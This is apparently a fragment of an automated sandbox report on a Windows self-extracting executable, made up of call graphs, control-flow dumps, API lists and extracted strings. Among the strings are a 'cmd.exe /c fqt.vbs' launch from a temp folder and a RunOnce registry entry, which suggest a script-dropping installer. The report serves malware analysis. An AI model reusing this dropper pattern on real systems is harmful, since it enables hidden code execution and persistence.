2786->2789 2787->2785 2791 7ff7d6fd1984 2788->2791 2788->2800 2792 7ff7d6fd1be9 2789->2792 2790->2790 2793 7ff7d6fd1a81 LocalAlloc 2790->2793 2796 7ff7d6fd1995 GetShortPathNameA 2791->2796 2797 7ff7d6fd19ba 2791->2797 2792->2597 2793->2777 2798 7ff7d6fd1ab2 2793->2798 2802 7ff7d6fd1b54 2795->2802 2796->2797 2801 7ff7d6fd114c _vsnprintf 2797->2801 2799 7ff7d6fd114c _vsnprintf 2798->2799 2799->2800 2800->2786 2801->2800 2864 7ff7d6fd2a6c 2802->2864 2804 7ff7d6fd1dce 2803->2804 2805 7ff7d6fd2019 2803->2805 2808 7ff7d6fd114c _vsnprintf 2804->2808 2810 7ff7d6fd1e25 2804->2810 2806 7ff7d6fd8470 7 API calls 2805->2806 2807 7ff7d6fd2028 2806->2807 2807->2597 2809 7ff7d6fd1dee RegQueryValueExA 2808->2809 2809->2804 2809->2810 2811 7ff7d6fd1e46 GetSystemDirectoryA 2810->2811 2812 7ff7d6fd1e29 RegCloseKey 2810->2812 2813 7ff7d6fd7ba8 CharPrevA 2811->2813 2812->2805 2814 7ff7d6fd1e6a LoadLibraryA 2813->2814 2815 7ff7d6fd1f55 GetModuleFileNameA 2814->2815 2816 7ff7d6fd1e86 GetProcAddress FreeLibrary 2814->2816 2817 7ff7d6fd1f78 RegCloseKey 2815->2817 2821 7ff7d6fd1ee8 2815->2821 2816->2815 2818 7ff7d6fd1ebe GetSystemDirectoryA 2816->2818 2817->2805 2819 7ff7d6fd1ed5 2818->2819 2818->2821 2820 7ff7d6fd7ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff7d6fd1f11 LocalAlloc 2821->2822 2823 7ff7d6fd1f35 2822->2823 2824 7ff7d6fd1f8e 2822->2824 2826 7ff7d6fd4dcc 24 API calls 2823->2826 2825 7ff7d6fd114c _vsnprintf 2824->2825 2827 7ff7d6fd1fc4 2825->2827 2828 7ff7d6fd1f53 2826->2828 2827->2827 2829 7ff7d6fd1fcd RegSetValueExA RegCloseKey LocalFree 2827->2829 2828->2817 2829->2805 2831 7ff7d6fd48b3 2830->2831 2832 7ff7d6fd47c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff7d6fd7700 GetLastError 2831->2891 2833 7ff7d6fd47f9 2832->2833 2839 7ff7d6fd2318 18 API calls 2833->2839 2844 7ff7d6fd482a CloseHandle CloseHandle 2833->2844 2835 7ff7d6fd48b8 GetLastError FormatMessageA 2836 7ff7d6fd4dcc 24 API calls 2835->2836 2838 7ff7d6fd491c 2836->2838 2841 7ff7d6fd8470 7 API calls 2838->2841 2843 7ff7d6fd484d 2839->2843 2840 7ff7d6fd48aa 2840->2838 2842 7ff7d6fd492f 2841->2842 2842->2597 2843->2844 2844->2838 2844->2840 2846 7ff7d6fd7a25 2845->2846 2847 7ff7d6fd7ba8 CharPrevA 2846->2847 2848 7ff7d6fd7a63 GetFileAttributesA 2847->2848 2849 7ff7d6fd7a96 LoadLibraryA 2848->2849 2850 7ff7d6fd7a79 2848->2850 2852 7ff7d6fd7aa9 2849->2852 2850->2849 2851 7ff7d6fd7a7d LoadLibraryExA 2850->2851 2851->2852 2853 7ff7d6fd8470 7 API calls 2852->2853 2854 7ff7d6fd7ab9 2853->2854 2854->2611 2855->2610 2857 7ff7d6fd1609 2856->2857 2859 7ff7d6fd1621 2857->2859 2861 7ff7d6fd1651 2857->2861 2877 7ff7d6fd7ce8 2857->2877 2860 7ff7d6fd7ce8 2 API calls 2859->2860 2862 7ff7d6fd162f 2860->2862 2861->2768 2861->2770 2862->2861 2863 7ff7d6fd7ce8 2 API calls 2862->2863 2863->2862 2865 7ff7d6fd2aa0 GetModuleFileNameA 2864->2865 2866 7ff7d6fd2c24 2864->2866 2865->2866 2874 7ff7d6fd2ac8 2865->2874 2867 7ff7d6fd8470 7 API calls 2866->2867 2869 7ff7d6fd2c37 2867->2869 2868 7ff7d6fd2acc IsDBCSLeadByte 2868->2874 2869->2786 2870 7ff7d6fd2bf6 CharNextA 2872 7ff7d6fd2c08 CharNextA 2870->2872 2871 7ff7d6fd2af1 CharNextA CharUpperA 2873 7ff7d6fd2b9b CharUpperA 2871->2873 2871->2874 2872->2866 2872->2868 2873->2874 2874->2868 2874->2870 2874->2871 2874->2872 2876 7ff7d6fd2b36 CharPrevA 2874->2876 2882 7ff7d6fd7c40 2874->2882 2876->2874 2878 7ff7d6fd7d00 2877->2878 2879 7ff7d6fd7d0a IsDBCSLeadByte 2878->2879 2880 7ff7d6fd7d47 2878->2880 2881 7ff7d6fd7d30 CharNextA 2878->2881 2879->2878 2879->2880 2880->2857 2881->2878 2883 7ff7d6fd7c58 2882->2883 2883->2883 2884 7ff7d6fd7c61 CharPrevA 2883->2884 2885 7ff7d6fd7c7d CharPrevA 2884->2885 2886 7ff7d6fd7c94 2885->2886 2887 7ff7d6fd7c75 2885->2887 2888 7ff7d6fd7cc7 2886->2888 2889 7ff7d6fd7cb5 CharNextA 2886->2889 2890 7ff7d6fd7c9e CharPrevA 2886->2890 2887->2885 2887->2886 2888->2874 2889->2888 2890->2888 2890->2889 2891->2835 2892->2629 2894 7ff7d6fd2281 2893->2894 2895 7ff7d6fd22eb 2893->2895 2896 7ff7d6fd7ba8 CharPrevA 2894->2896 2897 7ff7d6fd8470 7 API calls 2895->2897 2898 7ff7d6fd2294 WritePrivateProfileStringA _lopen 2896->2898 2899 7ff7d6fd22fd 2897->2899 2898->2895 2900 7ff7d6fd22c7 _llseek _lclose 2898->2900 2899->2225 2900->2895 2995 7ff7d6fd3840 2996 7ff7d6fd3852 2995->2996 2997 7ff7d6fd385a 2995->2997 2996->2997 2999 7ff7d6fd388e GetDesktopWindow 2996->2999 2998 7ff7d6fd38ec EndDialog 2997->2998 3001 7ff7d6fd385f 2997->3001 2998->3001 3000 7ff7d6fd4c68 14 API calls 2999->3000 3002 7ff7d6fd38a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3000->3002 3002->3001 3003 7ff7d6fd1500 3004 7ff7d6fd1530 3003->3004 3005 7ff7d6fd1557 GetDesktopWindow 3003->3005 3007 7ff7d6fd1542 EndDialog 3004->3007 3008 7ff7d6fd1553 3004->3008 3006 7ff7d6fd4c68 14 API calls 3005->3006 3009 7ff7d6fd156e LoadStringA SetDlgItemTextA MessageBeep 3006->3009 3007->3008 3010 7ff7d6fd8470 7 API calls 3008->3010 3009->3008 3011 7ff7d6fd15d0 3010->3011 3019 7ff7d6fd8750 3020 7ff7d6fd875f 3019->3020 3021 7ff7d6fd8782 3019->3021 3020->3021 3022 7ff7d6fd877b ?terminate@ 3020->3022 3022->3021 3023 7ff7d6fd8790 SetUnhandledExceptionFilter 2942 7ff7d6fd3910 2943 7ff7d6fd3933 2942->2943 2944 7ff7d6fd3a09 2942->2944 2943->2944 2945 7ff7d6fd3a11 GetDesktopWindow 2943->2945 2946 7ff7d6fd3948 2943->2946 2947 7ff7d6fd3b1a EndDialog 2944->2947 2950 7ff7d6fd3954 2944->2950 2965 7ff7d6fd4c68 6 API calls 2945->2965 2948 7ff7d6fd397b 2946->2948 2949 7ff7d6fd394c 2946->2949 2947->2950 2948->2950 2954 7ff7d6fd3985 ResetEvent 2948->2954 2949->2950 2953 7ff7d6fd395b TerminateThread 2949->2953 2953->2947 2957 7ff7d6fd4dcc 24 API calls 2954->2957 2955 7ff7d6fd3a9b SetWindowTextA CreateThread 2955->2950 2958 7ff7d6fd3ae8 2955->2958 2956 7ff7d6fd3a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2956->2955 2959 7ff7d6fd39c3 2957->2959 2960 7ff7d6fd4dcc 24 API calls 2958->2960 2961 7ff7d6fd39e4 SetEvent 2959->2961 2963 7ff7d6fd39cc SetEvent 2959->2963 2962 7ff7d6fd3b07 2960->2962 2970 7ff7d6fd3b40 2961->2970 2962->2944 2963->2950 2967 7ff7d6fd4d3f SetWindowPos 2965->2967 2968 7ff7d6fd8470 7 API calls 2967->2968 2969 7ff7d6fd3a2f 2968->2969 2969->2955 2969->2956 2971 7ff7d6fd3b4c MsgWaitForMultipleObjects 2970->2971 2972 7ff7d6fd3b74 PeekMessageA 2971->2972 2973 7ff7d6fd3be5 2971->2973 2972->2971 2976 7ff7d6fd3b99 2972->2976 2973->2944 2974 7ff7d6fd3ba7 DispatchMessageA 2975 7ff7d6fd3bb8 PeekMessageA 2974->2975 2975->2976 2976->2971 2976->2973 2976->2974 2976->2975 2977 7ff7d6fd5690 2978 7ff7d6fd3b40 4 API calls 2977->2978 2979 7ff7d6fd56b1 2978->2979 2980 7ff7d6fd56c2 WriteFile 2979->2980 2981 7ff7d6fd56ba 2979->2981 2980->2981 2982 7ff7d6fd56f9 2980->2982 2982->2981 2983 7ff7d6fd5725 SendDlgItemMessageA 2982->2983 2983->2981 3100 7ff7d6fd80d0 3102 7ff7d6fd80e2 3100->3102 3107 7ff7d6fd8818 GetModuleHandleW 3102->3107 3103 7ff7d6fd8149 __set_app_type 3104 7ff7d6fd8186 3103->3104 3105 7ff7d6fd818f __setusermatherr 3104->3105 3106 7ff7d6fd819c 3104->3106 3105->3106 3108 7ff7d6fd882d 3107->3108 3108->3103

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_00007FF7D6FD6CA4 44 Function_00007FF7D6FD4DCC 0->44 59 Function_00007FF7D6FD8470 0->59 81 Function_00007FF7D6FD7700 0->81 86 Function_00007FF7D6FD24F8 0->86 1 Function_00007FF7D6FD60A4 39 Function_00007FF7D6FD5050 1->39 1->44 1->81 2 Function_00007FF7D6FD7024 3 Function_00007FF7D6FD33A0 4 Function_00007FF7D6FD8A9C 5 Function_00007FF7D6FD261C 22 Function_00007FF7D6FD7BA8 5->22 5->59 94 Function_00007FF7D6FD1008 5->94 6 Function_00007FF7D6FD8818 31 Function_00007FF7D6FD87BC 6->31 7 Function_00007FF7D6FD2318 27 Function_00007FF7D6FD2244 7->27 8 Function_00007FF7D6FD5B18 9 Function_00007FF7D6FD8417 10 Function_00007FF7D6FD2DB4 24 Function_00007FF7D6FD70A8 10->24 10->39 41 Function_00007FF7D6FD204C 10->41 10->44 47 Function_00007FF7D6FD7AC8 10->47 58 Function_00007FF7D6FD3BF4 10->58 10->59 69 Function_00007FF7D6FD12EC 10->69 11 Function_00007FF7D6FD7E34 12 Function_00007FF7D6FD2834 12->5 13 Function_00007FF7D6FD8930 14 Function_00007FF7D6FD8B30 15 Function_00007FF7D6FD81B0 16 Function_00007FF7D6FD58B0 16->8 21 Function_00007FF7D6FD512C 16->21 33 Function_00007FF7D6FD51BC 16->33 16->59 62 Function_00007FF7D6FD5770 16->62 80 Function_00007FF7D6FD5380 16->80 85 Function_00007FF7D6FD527C 16->85 17 Function_00007FF7D6FD4A30 18 Function_00007FF7D6FD3530 18->0 18->22 18->44 53 Function_00007FF7D6FD4A60 18->53 61 Function_00007FF7D6FD6B70 18->61 70 Function_00007FF7D6FD4C68 18->70 19 Function_00007FF7D6FD78B0 19->22 19->59 20 Function_00007FF7D6FD772C 42 Function_00007FF7D6FD114C 20->42 20->59 76 Function_00007FF7D6FD1084 21->76 21->94 22->76 23 Function_00007FF7D6FD1D28 23->22 23->42 23->44 23->59 24->2 24->22 24->44 46 Function_00007FF7D6FD8648 24->46 24->59 71 Function_00007FF7D6FD7D68 24->71 73 Function_00007FF7D6FD7CE8 24->73 25 Function_00007FF7D6FD66C4 25->0 25->22 25->39 25->44 25->47 49 Function_00007FF7D6FD64E4 25->49 25->59 72 Function_00007FF7D6FD2468 25->72 25->81 26 Function_00007FF7D6FD40C4 26->22 26->23 32 Function_00007FF7D6FD473C 26->32 26->39 26->42 26->44 26->59 65 Function_00007FF7D6FD79F0 26->65 75 Function_00007FF7D6FD1684 26->75 26->81 27->22 27->59 28 Function_00007FF7D6FD7C40 29 Function_00007FF7D6FD3840 29->70 30 Function_00007FF7D6FD3B40 32->7 32->44 32->59 32->81 33->47 34 Function_00007FF7D6FD63B8 34->22 34->42 34->59 34->94 35 Function_00007FF7D6FD2C54 35->7 35->10 35->44 66 Function_00007FF7D6FD61EC 35->66 67 Function_00007FF7D6FD30EC 35->67 93 Function_00007FF7D6FD1C0C 35->93 36 Function_00007FF7D6FD8750 37 Function_00007FF7D6FD88D0 37->13 79 Function_00007FF7D6FD8880 37->79 38 Function_00007FF7D6FD7850 40 Function_00007FF7D6FD80D0 40->6 60 Function_00007FF7D6FD8870 40->60 41->22 41->41 41->59 41->76 43 Function_00007FF7D6FD494C 43->39 43->44 44->11 44->42 44->59 77 Function_00007FF7D6FD7F04 44->77 44->94 45 Function_00007FF7D6FD11CC 45->59 87 Function_00007FF7D6FD8494 46->87 47->44 48 Function_00007FF7D6FD8964 49->0 49->22 49->34 49->59 49->61 49->81 50 Function_00007FF7D6FD5FE4 50->20 50->39 50->44 51 Function_00007FF7D6FD8B60 52 Function_00007FF7D6FD5C60 52->59 52->62 52->80 53->44 53->94 54 Function_00007FF7D6FD55E0 55 Function_00007FF7D6FD57E0 56 Function_00007FF7D6FD8A62 56->4 57 Function_00007FF7D6FD3F74 57->39 57->44 57->47 57->81 58->11 58->12 58->44 58->59 58->77 59->87 61->22 61->44 61->81 61->94 63 Function_00007FF7D6FD5870 64 Function_00007FF7D6FD33F0 64->70 65->22 65->59 66->28 66->41 66->59 67->0 67->1 67->7 67->20 67->22 67->25 67->26 67->43 67->44 67->47 67->50 67->57 67->59 67->81 91 Function_00007FF7D6FD5D90 67->91 68 Function_00007FF7D6FD2A6C 68->28 68->59 68->94 69->45 69->59 70->59 72->44 72->59 74 Function_00007FF7D6FD15E8 74->73 75->22 75->42 75->44 75->59 75->68 75->71 75->74 75->76 75->94 77->59 78 Function_00007FF7D6FD8200 78->35 78->37 78->48 80->44 82 Function_00007FF7D6FD1500 82->59 82->70 83 Function_00007FF7D6FD7E00 84 Function_00007FF7D6FD8802 85->44 85->94 86->42 86->44 86->59 88 Function_00007FF7D6FD8790 89 Function_00007FF7D6FD8910 90 Function_00007FF7D6FD3910 90->30 90->44 90->70 91->39 91->44 91->52 92 Function_00007FF7D6FD5690 92->30 93->44 93->59

                                                                      Executed Functions

                                                                      Function 00007FF7D6FD40C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ff7d6fd40c4-7ff7d6fd4116 1 7ff7d6fd4118-7ff7d6fd4133 call 7ff7d6fd5050 0->1 2 7ff7d6fd4139-7ff7d6fd4141 0->2 1->2 9 7ff7d6fd4254-7ff7d6fd427d call 7ff7d6fd4dcc 1->9 4 7ff7d6fd4145-7ff7d6fd4167 memset 2->4 6 7ff7d6fd4282-7ff7d6fd4295 4->6 7 7ff7d6fd416d-7ff7d6fd4188 call 7ff7d6fd5050 4->7 8 7ff7d6fd4299-7ff7d6fd42a3 6->8 7->9 18 7ff7d6fd418e-7ff7d6fd4194 7->18 12 7ff7d6fd42a5-7ff7d6fd42ab 8->12 13 7ff7d6fd42b7-7ff7d6fd42c2 8->13 21 7ff7d6fd44ee 9->21 12->13 16 7ff7d6fd42ad-7ff7d6fd42b5 12->16 17 7ff7d6fd42c5-7ff7d6fd42c8 13->17 16->8 16->13 22 7ff7d6fd4328-7ff7d6fd433d call 7ff7d6fd1684 17->22 23 7ff7d6fd42ca-7ff7d6fd42e2 call 7ff7d6fd5050 17->23 19 7ff7d6fd4196-7ff7d6fd419b 18->19 20 7ff7d6fd419d-7ff7d6fd41a0 18->20 24 7ff7d6fd41b5 19->24 25 7ff7d6fd41a2-7ff7d6fd41ab 20->25 26 7ff7d6fd41ad-7ff7d6fd41af 20->26 28 7ff7d6fd44f0-7ff7d6fd451f call 7ff7d6fd8470 21->28 22->21 36 7ff7d6fd4343-7ff7d6fd434a 22->36 23->9 35 7ff7d6fd42e8-7ff7d6fd42ef 23->35 31 7ff7d6fd41b8-7ff7d6fd41bb 24->31 25->24 30 7ff7d6fd41b1 26->30 26->31 30->24 31->17 37 7ff7d6fd41c1-7ff7d6fd41cb 31->37 39 7ff7d6fd42f5-7ff7d6fd4322 CompareStringA 35->39 40 7ff7d6fd45d8-7ff7d6fd45df 35->40 41 7ff7d6fd434c-7ff7d6fd4353 36->41 42 7ff7d6fd436a-7ff7d6fd436c 36->42 43 7ff7d6fd4231-7ff7d6fd4234 37->43 44 7ff7d6fd41cd-7ff7d6fd41d0 37->44 39->22 39->40 49 7ff7d6fd45e5-7ff7d6fd45ec 40->49 50 7ff7d6fd472d-7ff7d6fd472f 40->50 41->42 46 7ff7d6fd4355-7ff7d6fd435c 41->46 51 7ff7d6fd4493-7ff7d6fd449b 42->51 52 7ff7d6fd4372-7ff7d6fd4379 42->52 43->22 45 7ff7d6fd423a-7ff7d6fd4252 call 7ff7d6fd5050 43->45 47 7ff7d6fd41d2-7ff7d6fd41d9 44->47 48 7ff7d6fd41db-7ff7d6fd41dd 44->48 45->9 45->17 46->42 56 7ff7d6fd435e-7ff7d6fd4360 46->56 57 7ff7d6fd41ea-7ff7d6fd41fb call 7ff7d6fd5050 47->57 48->21 58 7ff7d6fd41e3 48->58 49->50 59 7ff7d6fd45f2-7ff7d6fd4621 RegOpenKeyExA 49->59 50->28 54 7ff7d6fd44df-7ff7d6fd44e9 LocalFree 51->54 55 7ff7d6fd449d-7ff7d6fd44a4 call 7ff7d6fd473c 51->55 60 7ff7d6fd437f-7ff7d6fd4381 52->60 61 7ff7d6fd4599-7ff7d6fd45d3 call 7ff7d6fd4dcc LocalFree 52->61 54->21 69 7ff7d6fd44a9-7ff7d6fd44ab 55->69 56->52 65 7ff7d6fd4362-7ff7d6fd4365 call 7ff7d6fd1d28 56->65 57->9 80 7ff7d6fd41fd-7ff7d6fd422d CompareStringA 57->80 58->57 59->50 66 7ff7d6fd4627-7ff7d6fd4666 RegQueryValueExA 59->66 60->51 68 7ff7d6fd4387-7ff7d6fd438e 60->68 61->21 65->42 72 7ff7d6fd471c-7ff7d6fd4728 RegCloseKey 66->72 73 7ff7d6fd466c-7ff7d6fd469b memset GetSystemDirectoryA 66->73 68->51 75 7ff7d6fd4394-7ff7d6fd439f call 7ff7d6fd79f0 68->75 69->54 77 7ff7d6fd44ad-7ff7d6fd44c3 LocalFree 69->77 72->50 78 7ff7d6fd46b3-7ff7d6fd46dc call 7ff7d6fd114c 73->78 79 7ff7d6fd469d-7ff7d6fd46ae call 7ff7d6fd7ba8 73->79 85 7ff7d6fd4574-7ff7d6fd4597 call 7ff7d6fd4dcc 75->85 86 7ff7d6fd43a5-7ff7d6fd43c1 GetProcAddress 75->86 77->40 83 7ff7d6fd44c9-7ff7d6fd44ce 77->83 90 7ff7d6fd46e3-7ff7d6fd46ea 78->90 79->78 80->43 83->4 99 7ff7d6fd4553-7ff7d6fd456f LocalFree call 7ff7d6fd7700 85->99 88 7ff7d6fd4521-7ff7d6fd454e call 7ff7d6fd4dcc FreeLibrary 86->88 89 7ff7d6fd43c7-7ff7d6fd4415 86->89 88->99 92 7ff7d6fd441f-7ff7d6fd4427 89->92 93 7ff7d6fd4417-7ff7d6fd441b 89->93 90->90 94 7ff7d6fd46ec-7ff7d6fd4717 RegSetValueExA 90->94 97 7ff7d6fd4431-7ff7d6fd4433 92->97 98 7ff7d6fd4429-7ff7d6fd442d 92->98 93->92 94->72 102 7ff7d6fd4435-7ff7d6fd4439 97->102 103 7ff7d6fd443d-7ff7d6fd4445 97->103 98->97 99->21 102->103 105 7ff7d6fd444f-7ff7d6fd4451 103->105 106 7ff7d6fd4447-7ff7d6fd444b 103->106 107 7ff7d6fd4453-7ff7d6fd4457 105->107 108 7ff7d6fd445b-7ff7d6fd447e 105->108 106->105 107->108 110 7ff7d6fd44d3-7ff7d6fd44da FreeLibrary 108->110 111 7ff7d6fd4480-7ff7d6fd4491 FreeLibrary 108->111 110->54 111->77
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$cmd.exe /c fqt.vbs$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                      • API String ID: 2679723528-2313663239
                                                                      • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                      • Instruction ID: af7a76db2bb563758da45a8609b7e621cbfc1dc4360985fcfff809657c7f6626
                                                                      • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                      • Instruction Fuzzy Hash: 18024B71E08A4A86E720AB54AC402BFB7A4FB95748FD85136DB4D42694DF3CF54ACF20
                                                                      Function 00007FF7D6FD1D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183registrylibrarymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                      • API String ID: 178549006-3726664654
                                                                      • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                      • Instruction ID: bda8d37c5b11c3f6f983cffb632f1850e8e3937f7c25a4e8591e350cf5929039
                                                                      • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                      • Instruction Fuzzy Hash: 97813A32E08E4A96E710AB51EC542BEB7A5FB99B54FC85132DA4E43794DF3CE106CB10
                                                                      Function 00007FF7D6FD1684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 144 7ff7d6fd1684-7ff7d6fd16ce 145 7ff7d6fd16d3-7ff7d6fd16dd 144->145 146 7ff7d6fd16df-7ff7d6fd16e5 145->146 147 7ff7d6fd16f2-7ff7d6fd1704 145->147 146->147 148 7ff7d6fd16e7-7ff7d6fd16f0 146->148 149 7ff7d6fd1713-7ff7d6fd171a 147->149 150 7ff7d6fd1706-7ff7d6fd1711 147->150 148->145 148->147 151 7ff7d6fd171e-7ff7d6fd173c call 7ff7d6fd15e8 149->151 150->151 154 7ff7d6fd173e 151->154 155 7ff7d6fd17aa-7ff7d6fd17c2 151->155 157 7ff7d6fd1741-7ff7d6fd1748 154->157 156 7ff7d6fd17c7-7ff7d6fd17d1 155->156 158 7ff7d6fd17d3-7ff7d6fd17d9 156->158 159 7ff7d6fd17e6-7ff7d6fd17ff call 7ff7d6fd7ba8 156->159 157->157 160 7ff7d6fd174a-7ff7d6fd174e 157->160 158->159 161 7ff7d6fd17db-7ff7d6fd17e4 158->161 164 7ff7d6fd1804-7ff7d6fd1814 call 7ff7d6fd7d68 159->164 160->155 163 7ff7d6fd1750-7ff7d6fd1757 160->163 161->156 161->159 165 7ff7d6fd175e-7ff7d6fd1760 163->165 166 7ff7d6fd1759-7ff7d6fd175c 163->166 174 7ff7d6fd1a1b-7ff7d6fd1a2b call 7ff7d6fd7d68 164->174 175 7ff7d6fd181a-7ff7d6fd1847 CompareStringA 164->175 165->155 169 7ff7d6fd1762-7ff7d6fd1764 165->169 166->165 168 7ff7d6fd1766-7ff7d6fd1776 166->168 171 7ff7d6fd177b-7ff7d6fd1785 168->171 169->155 169->168 172 7ff7d6fd1787-7ff7d6fd178d 171->172 173 7ff7d6fd179a-7ff7d6fd17a8 171->173 172->173 176 7ff7d6fd178f-7ff7d6fd1798 172->176 173->164 183 7ff7d6fd1a31-7ff7d6fd1a5e CompareStringA 174->183 184 7ff7d6fd1acb-7ff7d6fd1ae9 LocalAlloc 174->184 175->174 178 7ff7d6fd184d-7ff7d6fd1861 GetFileAttributesA 175->178 176->171 176->173 180 7ff7d6fd19f3-7ff7d6fd19fb 178->180 181 7ff7d6fd1867-7ff7d6fd186f 178->181 182 7ff7d6fd1a00-7ff7d6fd1a16 call 7ff7d6fd4dcc 180->182 181->180 185 7ff7d6fd1875-7ff7d6fd1891 call 7ff7d6fd15e8 181->185 199 7ff7d6fd1bda-7ff7d6fd1c03 call 7ff7d6fd8470 182->199 183->184 190 7ff7d6fd1a60-7ff7d6fd1a67 183->190 188 7ff7d6fd1aa2-7ff7d6fd1aad 184->188 189 7ff7d6fd1aeb-7ff7d6fd1aff GetFileAttributesA 184->189 197 7ff7d6fd1893-7ff7d6fd18b0 call 7ff7d6fd15e8 185->197 198 7ff7d6fd18b5-7ff7d6fd18d1 LocalAlloc 185->198 188->182 193 7ff7d6fd1b01-7ff7d6fd1b03 189->193 194 7ff7d6fd1b7e-7ff7d6fd1b88 189->194 195 7ff7d6fd1a6a-7ff7d6fd1a71 190->195 193->194 200 7ff7d6fd1b05-7ff7d6fd1b16 193->200 196 7ff7d6fd1b8f-7ff7d6fd1b99 194->196 195->195 201 7ff7d6fd1a73 195->201 202 7ff7d6fd1b9b-7ff7d6fd1ba1 196->202 203 7ff7d6fd1bae-7ff7d6fd1bb9 196->203 197->198 198->188 205 7ff7d6fd18d7-7ff7d6fd194d GetPrivateProfileIntA GetPrivateProfileStringA 198->205 206 7ff7d6fd1b1d-7ff7d6fd1b27 200->206 208 7ff7d6fd1a78-7ff7d6fd1a7f 201->208 202->203 209 7ff7d6fd1ba3-7ff7d6fd1bac 202->209 210 7ff7d6fd1bbc-7ff7d6fd1bcc call 7ff7d6fd2a6c 203->210 211 7ff7d6fd1984-7ff7d6fd1993 205->211 212 7ff7d6fd194f-7ff7d6fd197f call 7ff7d6fd1008 * 2 205->212 213 7ff7d6fd1b3c-7ff7d6fd1b4d 206->213 214 7ff7d6fd1b29-7ff7d6fd1b2f 206->214 208->208 216 7ff7d6fd1a81-7ff7d6fd1aa0 LocalAlloc 208->216 209->196 209->203 225 7ff7d6fd1bd1-7ff7d6fd1bd5 210->225 221 7ff7d6fd1995-7ff7d6fd19b8 GetShortPathNameA 211->221 222 7ff7d6fd19ba 211->222 212->225 213->210 220 7ff7d6fd1b4f-7ff7d6fd1b52 213->220 214->213 219 7ff7d6fd1b31-7ff7d6fd1b3a 214->219 216->188 223 7ff7d6fd1ab2-7ff7d6fd1ac6 call 7ff7d6fd114c 216->223 219->206 219->213 220->210 227 7ff7d6fd1b54-7ff7d6fd1b7c call 7ff7d6fd1084 * 2 220->227 228 7ff7d6fd19c1-7ff7d6fd19ee call 7ff7d6fd114c 221->228 222->228 223->225 225->199 227->210 228->225
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
